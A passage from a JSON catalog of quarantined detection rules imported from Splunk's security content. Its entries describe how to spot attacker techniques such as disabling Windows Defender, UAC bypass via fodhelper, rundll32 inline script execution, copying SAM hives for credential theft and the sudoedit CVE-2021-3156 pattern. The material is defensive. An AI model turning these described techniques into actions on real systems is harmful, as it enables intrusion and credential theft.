adversaries often use it to bypass Windows Defender, allowing malicious code to execute without detection. If confirmed malicious, this behavior could enable attackers to evade antivirus defenses, maintain persistence, and execute further malicious activities undetected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-windows-defender-exclusion-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "907ac95c-4dd9-11ec-ba2c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_windows_defender_exclusion_commands.yml" } }, { "id": "splunk-security-content-908bf0d5-0983-4afd-b6a4-e9eb5d361a7d", "type": "detection", "name": "Windows Remote Desktop Network Bruteforce Attempt", "description": "The following analytic identifies potential Remote Desktop Protocol (RDP) brute force attacks by monitoring network traffic for RDP application activity. This query detects potential RDP brute force attacks by identifying source IPs that have made more than 10 connection attempts to the same RDP port on a host within a one-hour window. The results are presented in a table that includes the source and destination IPs, destination port, number of attempts, and the times of the first and last connection attempts, helping to prioritize IPs based on the intensity of activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-desktop-network-bruteforce-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "908bf0d5-0983-4afd-b6a4-e9eb5d361a7d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_remote_desktop_network_bruteforce_attempt.yml" } }, { "id": "splunk-security-content-90964d6a-4b5f-409a-85bd-95e261e03fe9", "type": "detection", "name": "Linux Auditd Unload Module Via Modprobe", "description": "The following analytic detects suspicious use of the `modprobe` command to unload kernel modules, which may indicate an attempt to disable critical system components or evade detection. The `modprobe` utility manages kernel modules, and unauthorized unloading of modules can disrupt system security features, remove logging capabilities, or conceal malicious activities. By monitoring for unusual or unauthorized `modprobe` operations involving module unloading, this analytic helps identify potential tampering with kernel functionality, enabling security teams to investigate and address possible threats to system integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-unload-module-via-modprobe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "90964d6a-4b5f-409a-85bd-95e261e03fe9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_unload_module_via_modprobe.yml" } }, { "id": "splunk-security-content-909f8fd8-7ac8-11eb-a1f3-acde48001122", "type": "detection", "name": "FodHelper UAC Bypass", "description": "The following analytic detects the execution of fodhelper.exe, which is known to exploit a User Account Control (UAC) bypass by leveraging specific registry keys. The detection method uses Endpoint Detection and Response (EDR) telemetry to identify when fodhelper.exe spawns a child process and accesses the registry keys. This activity is significant because it indicates a potential privilege escalation attempt by an attacker. If confirmed malicious, the attacker could execute commands with elevated privileges, leading to unauthorized system changes and potential full system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/fodhelper-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "909f8fd8-7ac8-11eb-a1f3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/fodhelper_uac_bypass.yml" } }, { "id": "splunk-security-content-910df401-b215-4675-88c5-2ad7b06d82a5", "type": "detection", "name": "ESXi System Clock Manipulation", "description": "This detection identifies a significant change to the system clock on an ESXi host, which may indicate an attempt to manipulate timestamps and evade detection or forensic analysis", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-system-clock-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "910df401-b215-4675-88c5-2ad7b06d82a5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_system_clock_manipulation.yml" } }, { "id": "splunk-security-content-911eacdc-317f-11ec-ad30-acde48001122", "type": "detection", "name": "Disabling Defender Services", "description": "The following analytic detects the disabling of Windows Defender services by monitoring registry modifications. It leverages registry event data to identify changes to specific registry paths associated with Defender services, where the 'Start' value is set to '0x00000004'. This activity is significant because disabling Defender services can indicate an attempt by an adversary to evade detection and maintain persistence on the endpoint. If confirmed malicious, this action could allow attackers to execute further malicious activities undetected, leading to potential data breaches or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-defender-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "911eacdc-317f-11ec-ad30-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_defender_services.yml" } }, { "id": "splunk-security-content-914ab191-fa8a-48cb-83a6-0565e061f934", "type": "detection", "name": "Windows IIS Server PSWA Console Access", "description": "This analytic detects access attempts to the PowerShell Web Access (PSWA) console on Windows IIS servers. It monitors web traffic for requests to PSWA-related URIs, which could indicate legitimate administrative activity or potential unauthorized access attempts. By tracking source IP, HTTP status, URI path, and HTTP method, it helps identify suspicious patterns or brute-force attacks targeting PSWA. This detection is crucial for maintaining the security of remote PowerShell management interfaces and preventing potential exploitation of this powerful administrative tool.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-iis-server-pswa-console-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "914ab191-fa8a-48cb-83a6-0565e061f934", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/windows_iis_server_pswa_console_access.yml" } }, { "id": "splunk-security-content-9170cb54-ea15-41e1-9dfc-9f3363ce9b02", "type": "detection", "name": "Windows Remote Services Allow Rdp In Firewall", "description": "The following analytic detects modifications to the Windows firewall to enable Remote Desktop Protocol (RDP) on a targeted machine. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving \"netsh.exe\" to allow TCP port 3389. This activity is significant as it may indicate an adversary attempting to gain remote access to a compromised host, a common tactic for lateral movement. If confirmed malicious, this could allow attackers to remotely control the system, leading to potential data exfiltration or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-services-allow-rdp-in-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9170cb54-ea15-41e1-9dfc-9f3363ce9b02", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_services_allow_rdp_in_firewall.yml" } }, { "id": "splunk-security-content-91b8ca78-f205-4826-a3ef-cd8d6b24e97b", "type": "detection", "name": "Linux Auditd Doas Tool Execution", "description": "The following analytic detects the execution of the 'doas' tool on a Linux host. This tool allows standard users to perform tasks with root privileges, similar to 'sudo'. The detection leverages data from Linux Auditd, focusing on process names and command-line executions. This activity is significant as 'doas' can be exploited by adversaries to gain elevated privileges on a compromised host. If confirmed malicious, this could lead to unauthorized administrative access, potentially compromising the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-doas-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "91b8ca78-f205-4826-a3ef-cd8d6b24e97b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_doas_tool_execution.yml" } }, { "id": "splunk-security-content-91c79f14-5b41-11eb-ae93-0242ac130002", "type": "detection", "name": "Detect Rundll32 Inline HTA Execution", "description": "The following analytic detects the execution of \"rundll32.exe\" with inline protocol handlers such as \"JavaScript\", \"VBScript\", and \"About\". This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on command-line arguments. This activity is significant as it is often associated with fileless malware or application whitelisting bypass techniques. If confirmed malicious, this could allow an attacker to execute arbitrary code, bypass security controls, and maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-rundll32-inline-hta-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "91c79f14-5b41-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_rundll32_inline_hta_execution.yml" } }, { "id": "splunk-security-content-92033cab-1871-483d-a03b-a7ce98665cfc", "type": "detection", "name": "Linux Emacs Privilege Escalation", "description": "The following analytic detects the execution of Emacs with elevated privileges using the `sudo` command and the `--eval` option. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line arguments. This activity is significant because it indicates a potential privilege escalation attempt, where a user could gain root access by running Emacs with elevated permissions. If confirmed malicious, this could allow an attacker to execute arbitrary commands as root, leading to full system compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-emacs-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "92033cab-1871-483d-a03b-a7ce98665cfc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_emacs_privilege_escalation.yml" } }, { "id": "splunk-security-content-9216ef3d-066a-4958-8f27-c84589465e62", "type": "detection", "name": "Windows Driver Load Non-Standard Path", "description": "The following analytic detects the loading of new Kernel Mode Drivers from non-standard paths using Windows EventCode 7045. It identifies drivers not located in typical directories like Windows, Program Files, or SystemRoot. This activity is significant because adversaries may use these non-standard paths to load malicious or vulnerable drivers, potentially bypassing security controls. If confirmed malicious, this could allow attackers to execute code at the kernel level, escalate privileges, or maintain persistence within the environment, posing a severe threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1014", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-driver-load-non-standard-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9216ef3d-066a-4958-8f27-c84589465e62", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_driver_load_non_standard_path.yml" } }, { "id": "splunk-security-content-9251299c-ea5b-11eb-a8de-acde48001122", "type": "detection", "name": "Detect Copy of ShadowCopy with Script Block Logging", "description": "The following analytic detects the use of PowerShell commands to copy the SAM, SYSTEM, or SECURITY hives, which are critical for credential theft. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command executed. This activity is significant as it indicates an attempt to exfiltrate sensitive registry hives for offline password cracking. If confirmed malicious, this could lead to unauthorized access to credentials, enabling further compromise of the system and potential lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-copy-of-shadowcopy-with-script-block-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9251299c-ea5b-11eb-a8de-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_copy_of_shadowcopy_with_script_block_logging.yml" } }, { "id": "splunk-security-content-9296f515-073c-43a5-88ec-eda5a4626654", "type": "detection", "name": "Detect Remote Access Software Usage URL", "description": "The following analytic detects the execution of known remote access software within the environment.\nIt leverages network logs mapped to the Web data model, identifying specific URLs and user agents associated with remote access tools like AnyDesk, GoToMyPC, LogMeIn, and TeamViewer.\nThis activity is significant as adversaries often use these utilities to maintain unauthorized remote access. If confirmed malicious, this could allow attackers to control systems remotely, exfiltrate data, or further compromise the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-remote-access-software-usage-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9296f515-073c-43a5-88ec-eda5a4626654", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/detect_remote_access_software_usage_url.yml" } }, { "id": "splunk-security-content-92d51712-ee29-11eb-b1ae-acde48001122", "type": "detection", "name": "Suspicious Rundll32 PluginInit", "description": "The following analytic identifies the execution of the rundll32.exe process with the \"plugininit\" parameter. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line arguments. This activity is significant because the \"plugininit\" parameter is commonly associated with IcedID malware, which uses it to execute an initial DLL stager to download additional payloads. If confirmed malicious, this behavior could lead to further malware infections, data exfiltration, or complete system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-rundll32-plugininit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "92d51712-ee29-11eb-b1ae-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_rundll32_plugininit.yml" } }, { "id": "splunk-security-content-93048164-3358-4af0-8680-aa5f38440516", "type": "detection", "name": "Windows Modify Registry EnableLinkedConnections", "description": "The following analytic detects a suspicious modification to the Windows registry setting for EnableLinkedConnections. It leverages data from the Endpoint.Registry datamodel to identify changes where the registry path is \"*\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections\" and the value is set to \"0x00000001\". This activity is significant because enabling linked connections can allow network shares to be accessed with both standard and administrator-level privileges, a technique often abused by malware like BlackByte ransomware. If confirmed malicious, this could lead to unauthorized access to sensitive network resources, escalating the attacker's privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-enablelinkedconnections.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "93048164-3358-4af0-8680-aa5f38440516", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_enablelinkedconnections.yml" } }, { "id": "splunk-security-content-9319dda5-73f2-4d43-a85a-67ce961bddb7", "type": "detection", "name": "Suspicious Rundll32 StartW", "description": "The following analytic identifies the execution of rundll32.exe with the DLL function names \"Start\" and \"StartW,\" commonly associated with Cobalt Strike payloads. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process metadata. This activity is significant as it often indicates the presence of malicious payloads, such as Cobalt Strike, which can lead to unauthorized code execution. If confirmed malicious, this activity could allow attackers to inject shellcode, escalate privileges, and maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-rundll32-startw.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9319dda5-73f2-4d43-a85a-67ce961bddb7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_rundll32_startw.yml" } }, { "id": "splunk-security-content-9364ee8e-a39a-11eb-8f1d-acde48001122", "type": "detection", "name": "Anomalous usage of 7zip", "description": "The following analytic detects the execution of 7z.exe, a 7-Zip utility, spawned from rundll32.exe or dllhost.exe. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process names and parent processes. This activity is significant as it may indicate an adversary attempting to use 7-Zip for data exfiltration, often by renaming the executable to evade detection. If confirmed malicious, this could lead to unauthorized data archiving and exfiltration, compromising sensitive information and potentially leading to further system exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/anomalous-usage-of-7zip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9364ee8e-a39a-11eb-8f1d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/anomalous_usage_of_7zip.yml" } }, { "id": "splunk-security-content-93c91139-01f8-4905-802b-0d106f026b13", "type": "detection", "name": "Windows Outlook LoadMacroProviderOnBoot Persistence", "description": "The following analytic detects the modification of the Windows Registry key \"LoadMacroProviderOnBoot\" under Outlook. This enables automatic loading of macros, which could allow malicious scripts to run without notice. This detection leverages data from the Endpoint.Registry datamodel to search for this key being enabled. This activity is significant as it is commonly associated with some malware infections, indicating potential malicious intent to harvest email information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1137" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-outlook-loadmacroprovideronboot-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "93c91139-01f8-4905-802b-0d106f026b13", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_outlook_loadmacroprovideronboot_persistence.yml" } }, { "id": "splunk-security-content-93c94be3-bead-4a60-860f-77ca3fe59903", "type": "detection", "name": "GetDomainGroup with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments that query for domain groups using `Get-DomainGroup`. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions mapped to the `Processes` node of the `Endpoint` data model. Monitoring this activity is crucial as `Get-DomainGroup` is part of PowerView, a tool often used by adversaries for domain enumeration and situational awareness. If confirmed malicious, this activity could allow attackers to gain insights into domain group structures, aiding in further exploitation and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getdomaingroup-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "93c94be3-bead-4a60-860f-77ca3fe59903", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getdomaingroup_with_powershell.yml" } }, { "id": "splunk-security-content-93db24a0-fd21-45d7-9daf-84afd5a8cca2", "type": "detection", "name": "Cisco Secure Firewall - Citrix NetScaler Memory Overread Attempt", "description": "This analytic detects exploitation activity of CVE-2025-5777 using Cisco Secure Firewall Intrusion Events.\nIt leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to identify cases where Snort signature 65118 (Citrix NetScaler memory overread attempt) is triggered\nIf confirmed malicious, this behavior is highly indicative of a potential exploitation of CVE-2025-5777.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-citrix-netscaler-memory-overread-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "93db24a0-fd21-45d7-9daf-84afd5a8cca2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___citrix_netscaler_memory_overread_attempt.yml" } }, { "id": "splunk-security-content-93f114f6-cb1e-419b-ac3f-9e11a3045e70", "type": "detection", "name": "Windows Impair Defense Disable Win Defender Gen reports", "description": "The following analytic detects modifications in the Windows registry to disable Windows Defender generic reports. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the \"DisableGenericRePorts\" registry value. This activity is significant as it can prevent the transmission of error reports to Microsoft's Windows Error Reporting service, potentially hiding malicious activities. If confirmed malicious, this action could allow attackers to bypass Windows Defender detections, reducing the visibility of their activities and increasing the risk of undetected system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-win-defender-gen-reports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "93f114f6-cb1e-419b-ac3f-9e11a3045e70", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_win_defender_gen_reports.yml" } }, { "id": "splunk-security-content-93fbec4e-0375-440c-8db3-4508eca470c4", "type": "detection", "name": "Detect Baron Samedit CVE-2021-3156", "description": "The following analytic detects attempts to exploit the Baron Samedit vulnerability (CVE-2021-3156) by identifying the use of the \"sudoedit -s \\\\\" command. This detection leverages logs from Linux systems, specifically searching for instances of the sudoedit command with the \"-s\" flag followed by a double quote. This activity is significant because it indicates an attempt to exploit a known vulnerability that allows attackers to gain root privileges. If confirmed malicious, this could lead to complete system compromise, unauthorized access to sensitive data, and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-baron-samedit-cve-2021-3156.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "93fbec4e-0375-440c-8db3-4508eca470c4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_baron_samedit_cve_2021_3156.yml" } }, { "id": "splunk-security-content-942548a3-0273-47a4-8dbd-e5202437395c", "type": "detection", "name": "O365 Application Available To Other Tenants", "description": "The following analytic identifies the configuration of Azure Active Directory Applications in a manner that allows authentication from external tenants or personal accounts. This configuration can lead to inappropriate or malicious access of any data or capabilities the application is allowed to access. This detection leverages the O365 Universal Audit Log data source.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-application-available-to-other-tenants.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "942548a3-0273-47a4-8dbd-e5202437395c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_application_available_to_other_tenants.yml" } }, { "id": "splunk-security-content-94396c3e-7728-422a-9956-e4b77b53dbdf", "type": "detection", "name": "O365 Email Reported By Admin Found Malicious", "description": "The following analytic detects when an email manually submitted to Microsoft through the Security & Compliance portal is found to be malicious. This capability is an enhanced protection feature that can be used within o365 tenants by administrative users to report potentially malicious emails. This correlation looks for any submission that returns a Phish or Malware verdict upon submission.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-reported-by-admin-found-malicious.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94396c3e-7728-422a-9956-e4b77b53dbdf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_reported_by_admin_found_malicious.yml" } }, { "id": "splunk-security-content-94481a6a-8f59-4c86-957f-55a71e3612a6", "type": "detection", "name": "Azure AD 